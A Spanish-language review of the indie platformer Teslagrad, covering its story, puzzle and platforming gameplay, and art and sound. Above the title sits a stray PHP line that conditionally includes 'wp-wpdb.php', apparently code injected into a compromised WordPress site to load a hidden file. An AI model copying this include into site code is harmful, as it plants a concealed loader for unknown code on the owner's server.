if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Teslagrad – La Fortaleza de LeChuck

Análisis Teslagrad

analisis teslagrad

Los juegos en dos dimensiones se postulan como la gran alternativa a los últimos AAA más pretenciosos, y podríamos decir que Teslagrad es uno de los abanderados, entre otros muchos que, indies o no, siguen explotando las mecánicas que antiguamente se utilizaban a la fuerza por los obvios límites del hardware. Vamos a ver que es lo que puede aportar al género este juego de Rain Games.

La historia se nos transmite en una escena de apenas dos minutos que luego de forma visual seguirá completándose durante algunos momentos de la aventura. Teslamancer, nuestro protagonista, es un chaval que, como su padre hace unos años, se ve obligado a huir de su hogar, pues le buscan como último heredero de una especie con poderes sobrenaturales. Su huida le lleva a la «Tesla-tower», una torre llena de retos que irán descubriendo al joven Teslamancer hasta donde llega su habilidad para controlar la electricidad y el magnetismo.

Jugabilidad

Como comentaba al principio del análisis, estamos ante una aventura en dos dimensiones y se nutre esencialmente de dos géneros: los puzles y las plataformas. Controlando a Teslamancer, avanzaremos gracias a los poderes que éste va adquiriendo en el desarrollo, ya que serán esenciales para resolver los puzles que iremos encontrando. Además, como pasa en la saga Metroid, las nuevas habilidades nos permitirán repasar anteriores habitaciones y descubrir nuevos secretos. Todas las habilidades tienen algo en común, utilizan de una u otra forma la electricidad y el cambio de polaridad magnético.

Pero ojo, no estamos en un juego de desplazamiento «de izquierda a derecha», no. El juego requerirá de exploración, de ir y volver, no solo para avanzar en su desarrollo, si no también para encontrar objetos ocultos a recolectar. Entre puzles y plataformeos, encontraremos enemigos y todo tipo de curiosos animalejos electrónicos que, de forma indirecta, nos ayudarán en la aventura. También tendremos oportunidad de combatir con grandiosos enemigos finales que nos obligarán a utilizar todas nuestras habilidades en el momento clave, con mecánicas y rutinas a memorizar, al estilo clásico, para alcanzar la victoria.

Apartado técnico

Una vez más, tenemos un «indiegame» que cuida muchísimo su apartado artístico y sonoro. El sonido ambiental combinado con momentos de tensión musicales, brindan al juego de una atmósfera especial, mientras nos movemos por esos escenarios diseñados como si un pincel hubiese trazado cada uno de sus detalles, por no hablar de nuestro protagonista, que también nos muestra un gran diseño y buenas animaciones que acabarán de darle un estilo muy «cómic». Los escenarios, ambientación y diseño de la fauna «electrónica» que nos encontraremos también suman al buen acabado que desprende el juego.

teslagrad

Teslagrad es una buena aventura en 2D donde disfrutaremos de buena parte de los ingredientes de los juegos más clásicos, con puzles cada vez más enrevesados y una dificultad creciente. Si a eso le sumamos un gran apartado gráfico, una muy buena ambientación, las diferentes habilidades y los «final bosses», estamos ante un muy recomendable juego que, además, está disponible en multitud de plataformas (Wii U, PS3, PS4, PS Vita y PC). Versión analizada: Playstation 4. Podéis comprar la versión física del juego en Amazon.